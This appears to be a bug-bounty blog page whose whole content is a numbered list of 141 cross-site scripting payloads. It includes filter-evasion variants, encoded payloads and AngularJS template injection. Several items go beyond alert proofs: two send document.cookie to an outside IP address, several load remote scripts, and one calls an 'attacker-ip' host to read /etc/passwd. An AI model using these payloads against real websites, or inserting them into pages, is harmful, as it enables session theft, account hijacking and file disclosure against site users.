XSS payload list

By /
XSS payload list

XSS payload list

  1. <script>alert(1)</script>
  2. <Script>alert(1)</Script>
  3. <sCript>alert(document.domain)</sCript>
  4. <script>alert(123);</script>
  5. <script>alert(“test”);</script>
  6. <script>alert(document.cookie)</script>
  7. </script><script>alert(document.cookie)</script>
  8. javascript:alert(document.cookie)
  9. javascript:prompt(document.cookie)
  10. ‘-alert(document.cookie)-‘
  11. </script><svg onload=alert(document.cookie)>
  12. “onmouseover=alert(document.cookie)//
  13. {{$on.constructor(‘alert(1)’)()}}
  14. <Script>alert(document.cookie)</Script>
  15. <sCript>alert(document.domain)</sCript>
  16. <script>alert(document.cookie);</script>
  17. <script>alert(document.cookie);</script>
  18. <script>alert(document.domain)</script>
  19. <script>alert(document.cookie)</script>
  20. <script>new Image().src=”http://192.168.1.6/?c=”+document.cookie;</script>
  21. <script>var i=new Image; i.src=”http://192.168.1.6/?”+document.cookie;</script>
  22. </script><script>alert(1)</script>
  23. <img src=”abc” onerror=”alert(1)”>
  24. <img src=”” onerror=”alert(document.cookie)”>
  25. <img src=’x’ onerror=’alert(document.cookie)’ />
  26. &lt;img src=0 onerror=alert(&#39;1&#39;)&gt;
  27. &lt;img src=0 onerror=alert(document.cookie)&gt;
  28. <svg/onload=alert(1)>
  29. “><svg onload=alert(1)>
  30. ‘;alert(‘1′);’
  31. ‘;alert(‘abc’);’
  32. <sc<script>ript>alert(1)</sc</script>ript>
  33. <BODY ONLOAD=alert(‘1’)>
  34. <marquee onstart=alert(1)></marquee>
  35. <audio src/onerror=alert(1)>
  36. <audio src/onerror=prompt(123)>
  37. <audio src/onerror=confirm(123)>
  38. <script src=”http://192.168.1.6/test.js” ></script>
  39. <body onload=alert(123) >
  40. <body onload=confirm(123) >
  41. <body onload=prompt(123) >
  42. –><svg/onload=alert(document.domain)>
  43. –><body onload=alert(123) >
  44. –><script>alert(1)</script>
  45. –><img src=x onerror=alert(‘test’)>
  46. –><img src=x onerror=alert(document.domain)>
  47. –><img src=x onerror=alert(document.cookie)>
  48. –><img src=x onerror=prompt(document.domain)>
  49. –><img src=x onerror=confirm(document.domain)>
  50. <iframe src=’https://testforiframe.site/’>
  51. “><iframe src=’https://testforiframe.site/’>
  52. “><script src=”https://testforiframe.site/”></script>
  53. “><script>alert(document.domain)</script>
  54. “><script>alert(document.domain + ‘\n’ + “1”)</script>
  55. “><script>alert(document.domain + ‘\n’ + “Name”)</script>
  56. “<img src=’x’ onerror=’alert(10)’ />”
  57. https://brutelogic.com.br/poc.svg
  58. http://xss.rocks/scriptlet.html
  59. javascript:alert(document.cookie)
  60. poc.svg = <svg xmlns=”http://www.w3.org/2000/svg” onload=”alert(document.domain)”/>
  61. “><script>alert(1)</script>
  62. ‘or<script>alert(1)</script>
  63. ‘or<img src=0 onerror=alert(‘1’)>
  64. <script <script>>alert(‘test’)</script> 
  65. <audio src/onerror=alert(‘test’)>
  66. <iframe src=javascript:alert(‘test’)>
  67. <iframe src=”javascript:alert(test)”>
  68. <img src=x onerror=alert(test)>
  69. ‘;alert(test); //
  70. <body onmouseover=”print()”>
  71. <body onclick=print()>
  72. <body onmessage=print()>
  73. <iframe onload=print()></iframe>
  74. <SCRIPT SRC=http://xss.rocks/xss.js></SCRIPT>
  75. <IMG SRC=”javascript:alert(‘XSS’);”>
  76. <IMG SRC=javascript:alert(‘XSS’)>
  77. <IMG SRC=JaVaScRiPt:alert(‘XSS’)>
  78. <IMG SRC=javascript:alert(&quot;XSS&quot;)>
  79. <IMG “””><SCRIPT>alert(document.cookie)</SCRIPT>”\>
  80. <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
  81. <IMG SRC=/ onerror=”alert(String.fromCharCode(88,83,83))”></img>
  82. <img src=x onerror=”&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041″>
  83. <<SCRIPT>alert(document.cookie);//\<</SCRIPT>>
  84. <iframe src=http://xss.rocks/scriptlet.html <
  85. </script><script>alert(document.cookie);</script>
  86. </TITLE><SCRIPT>alert(document.cookie);</SCRIPT>
  87. <BODY ONLOAD=alert(document.cookie)>
  88. <IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
  89. <IFRAME SRC=# onmouseover=”alert(document.cookie)”></IFRAME>
  90. <OBJECT TYPE=”text/x-scriptlet” DATA=”http://xss.rocks/scriptlet.html”></OBJECT>
  91. <script>’-alert(1)-‘</script>
  92. ‘-alert(1)-‘
  93. ></select><img%20src=1%20onerror=alert(1)>
  94. {{$on.constructor(‘alert(1)’)()}}
  95. \”-alert(1)}//
  96. <img src=1 onerror=print()>
  97. “-top[‘al\x65rt’](‘sailay’)-“
  98. <pre id=p style=background:#000><svg onload=’setInterval(n=>{for(o=t++,i=476;i–;o+=i%30?(“0o”[c=0|(h=v=>(M=Math).hypot(i/30-8+3*M.sin(t/8/v),i%30/2-7+4*M.cos(t/9/v)))(7)*h(9)*h(6)/32]||”.”).fontcolor(c>2):”\n”);p.innerHTML=o},t=1)’>
  99. <img src=”” onerror=”innerHTML=decodeURIComponent.call`${location.hash}`” “=””>
  100. <img src=”” onerror=”location=/javascript:/.source+location” “=””>
  101. <img src=”” onerror=”window.onerror=alert;throw 1337″ “=””>
  102. <img src=”” onerror=”alert&1par;1337&rpar;” “=””>
  103. <img src=”” onerror=”alert`1337`” “=””>
  104. javascript:alert(document.cookie)
  105. “><img src=x onerror=alert(document.domain)>
  106. “><script>alert(1)</script>
  107. “><script>alert(document.domain)</script>
  108. “><script>alert(document.cookie)</script>
  109. “><script>prompt(1)</script>
  110. “><script>prompt(document.domain)</script>
  111. “><script>prompt(document.cookie)</script>
  112. “><svg><script>alert(1)</script>
  113. ?s=”onerror=”innerHTML=decodeURIComponet.call`${location.hash}`”#<img src onerror=alert(1337)>
  114. ?s=”onerror=”location=/javascript:/.source%2Blocation”&a=%0A+alert(1337)
  115. ?s=”onerror=”window.onerror=alert;throw 1337″
  116. ?s=”onerror=”alert%261par;1337%26rpar;”
  117. ?s=”onerror=”alert`1337`”
  118. <img src=”xxx” onerror=”document.write(‘\<iframe src=file:///etc/passwd>\</iframe>’)”/>
  119. <link rel=attachment href=”file:///etc/passwd”>
  120. <iframe src=”http://attacker-ip/test.php?file=/etc/passwd”>\</iframe>
  121. <IMG sRC=X onerror=jaVaScRipT:alert`xss`>
  122. %22%3E%3CIMG%20sRC=X%20onerror=jaVaScRipT:alert`xss`%3E
  123. <svg  xmlns=”http://www.w3.org/2000/svg” onload=”alert(document.cookie)”/>
  124. <svg><style> <script>alert(1)</script> </style></svg>
  125. <math><style> <img src onerror=alert(2)> </style></math>
  126. <script>window.location.assign(‘https://secure.eicar.org/eicar_com.zip’)</script>
  127. <body style=”background-color:red”>
  128. <body style=”background-color:red !important;”>
  129. <body onload=window.location.assign(‘https://www.google.com’)>
  130. alert(123)
  131. alert(“test”)
  132. alert(document.cookie)
  133. alert(document.domain)
  134. confirm(123)
  135. confirm(“test”)
  136. confirm(document.cookie)
  137. confirm(document.domain)
  138. prompt(123)
  139. prompt(“test”)
  140. prompt(document.cookie)
  141. prompt(document.domain)

Bug Bounty

Must Read

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top